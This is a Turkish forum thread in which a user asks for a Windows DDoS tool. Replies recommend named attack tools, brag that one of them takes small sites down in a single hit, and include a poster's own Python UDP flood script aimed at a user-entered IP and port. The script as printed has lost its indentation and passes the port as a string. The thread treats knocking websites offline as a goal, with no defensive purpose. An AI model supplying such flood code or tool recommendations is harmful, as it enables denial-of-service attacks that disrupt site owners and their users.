Bana windowsta kullanabileceğim L4 L7 farketmez ddos tool önerir misiniz GitHubdakilerin çoğu çalışmıyor
Follow along with the video below to see how to install our site as a web app on your home screen.
Not: This feature may not be available in some browsers.
Hocam artık maliyetli oldu bu işler ama dur sana birşey atacağım müsait olsam ben anlatırdım müsait değilim.Bana windowsta kullanabileceğim L4 L7 farketmez ddos tool önerir misiniz GitHubdakilerin çoğu çalışmıyor
müsait olduğun zaman anlatirmisin dostum azda olsa rica etsemHocam artık maliyetli oldu bu işler ama dur sana birşey atacağım müsait olsam ben anlatırdım müsait değilim.
Yo gayette çoğu çalışıyor önerilerim : ddos-ripper , hammer dos için; Hunner kardeşim ben hunner tooluna bayılıyorum yani hunner ile tek bir vuruşta düşük siteler ölüyor orta sitelere iki - beş vuruşta düşüyor ddos-ripper da iyi hammer pek sevmem onu herkes seviyor diye önerdim ama benim en sevdiğim hunner derim ama lakin dos toolu buBana windowsta kullanabileceğim L4 L7 farketmez ddos tool önerir misiniz GitHubdakilerin çoğu çalışmıyor
udp flood bu sadece. Çok da iyi çalışmaz.alın kendi programım phytone ile yapılmış idare eder çok güçlü değil
import socket
hedef_ip = input("ip:")
hedef_port = input("port:")
veri_boyutu = 1024
udp_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
while True:
veri = b"a" * veri_boyutu
udp_socket.sendto(veri, (hedef_ip, hedef_port))
print(f"{veri_boyutu} byte veri gönderildi.")
hunner ddos toolunun github linkini bulamadımYo gayette çoğu çalışıyor önerilerim : ddos-ripper , hammer dos için; Hunner kardeşim ben hunner tooluna bayılıyorum yani hunner ile tek bir vuruşta düşük siteler ölüyor orta sitelere iki - beş vuruşta düşüyor ddos-ripper da iyi hammer pek sevmem onu herkes seviyor diye önerdim ama benim en sevdiğim hunner derim ama lakin dos toolu bu